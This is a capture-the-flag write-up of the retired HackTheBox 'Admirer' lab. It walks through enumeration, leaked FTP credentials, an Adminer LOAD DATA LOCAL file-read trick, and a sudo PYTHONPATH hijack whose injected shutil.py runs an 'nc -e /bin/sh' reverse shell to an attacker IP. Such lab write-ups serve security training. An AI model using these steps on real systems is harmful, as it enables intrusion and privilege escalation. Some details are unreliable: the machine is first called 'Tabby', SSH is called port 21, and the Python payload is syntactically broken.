HacktheBox — Admirer Writeup (Retired)

Tabby is a relatively easy machine if you don’t give up on enumeration.

Note: I saw this in my drafts and waited to publish it after it was retired to respect the guidelines set in place by HackTheBox.

First thing we do is update /etc/hosts with the ip of the machine. After that we start up an nmap scan for any open ports for enumeration.

nmap -T4 -p- 10.10.10.187

We do another scan on the open ports to check for versions.

nmap -T4 -A -p21,22,80 10.10.10.187

Lets enumerate port 80 first… We connect and notice that…well the site is made to admire things. While we connect we run dirbuster to look for any other hidden directories. We also look at robots.txt to check for our directories that are under “Disallow”.

So we got directory /admin-dir blocked off but after using a dirb we got two interesting files: credentials.txt & contacts.txt.

dirb http://admirer.htb/admin-dir/ -w

Credentials: ftpuser : %n?4Wz}R$tTF7

Which contains… well credentials and contacts. That’s convenient they have our un-enumerated port 21 ftpuser’s password. Let’s give it a try… Well we aren’t wrong in assuming that we are the username and password were right. We proceed to use the DIR and GET commands to grab any files that might be of interest to us.

Results from the acquired files:

Credentials found in index.php

All the other files had actual html files (Nothing of interest)

We look back at the results from dirb and find an interesting file named adminer.php so we go to it and find out it’s a login page.

After using the credentials from our downloads from ftp and our original credentials.txt file it all comes back negative so we look into the actual login page itself. “Adminer” version 4.6.2 we later find out after some google searching that here it says that there is a vulnerability where we can login to our own set up mysql database(exploit) with one table(dmp) and search up local files on their mysql database. So let’s go over out plan real quick:

1. We set up a publicly accessible mysql database(exploit).
2. Log into our own database using the victims Adminer.
3. Use sql commands to search on the “local” databases on the victims server for any information.
4. If that doesn’t work we take a snack/meal break.

We sign in to our mysql database and well we got in good job us. We navigate to SQL Commands making sure our database exploit is selected.

load data local\n into table dmp\n fields terminated by “\n”

We run it and boom we got a hit. We then navigate to select where we find…guess what MORE CREDENTIALS yay.

Credentials: waldo : &<h5b~yK3F#{PaPB&dA}{H>

We later find out these credentials can be used for our other un-enumerated port 21 (SSH). Come to find out they actually work and we have a user shell. Congrats us.

ssh waldo@admirer.htb

whoami\n sudo -l

After a quick whoami and sudo -l we find out that we can only sudo run one file. Might as well give it a shot. (The flag for user.txt is right where you are after a quick ls) After moving to the directory where our sudo file is we found out its a “System Administration Menu” ok.. let’s see the actual python code for anything we can exploit and where does this other file backup.py come in.

We find nothing much but we do find out where our backup.py file comes into play..

We should also inspect the backup.py file for anything we can exploit.

Ok, so nothing much as well but what’s weird is that it calls for a file named shutil which we assume is a .py file and has a def named make_archive with 3 variables in it. Weird but we can use this to our advantage. Technically if we start up our admin_tasks.sh it will call backup.py which is normal but we are doing it in sudo so the same permissions should apply to backup.py and that same file calls for a missing file that will also use root when in usage. So we can make a file with some type of python reverse shell that will give us root.

This may have been a lot of babbling but here’s the plan after a lot of google searching:

1. We create a directory(shutil) and file in /tmp/shutil because anywhere else would be deny us from doing so.
2. We add a reverse python shell in our shutil.py created file.
3. We also can’t forget to add the function make_archive(1,2,3) otherwise it won’t work because backup.py calls the file but only incorporates the function make_archive.
4. Execute and pray I don’t go to sleep with a loss.

Ok so after a couple google searches I found out we can use import os to do our netcat shell.

mkdir shutil

touch shutil/shutil.py

echo -e “import os\n def make_archive(1,2,3): os.system(nc -e /bin/sh 10.10.14.136 1234)” > shutil/shutil.py

Ok everything seems set up so might as well try.

sudo PYTHONPATH=/tmp/shutil /opt/scripts/admin_tasks.sh

We rooted the machine congrats us huh. Naturally the flag is in /root/root.txt

Overall it was a good machine if you have access to google. At first I couldn’t find any type of login page or anything interesting until a friend nudged me in the right direction which led me to do a spider search on /admin-dir and /utility-scripts leading to the rest of this.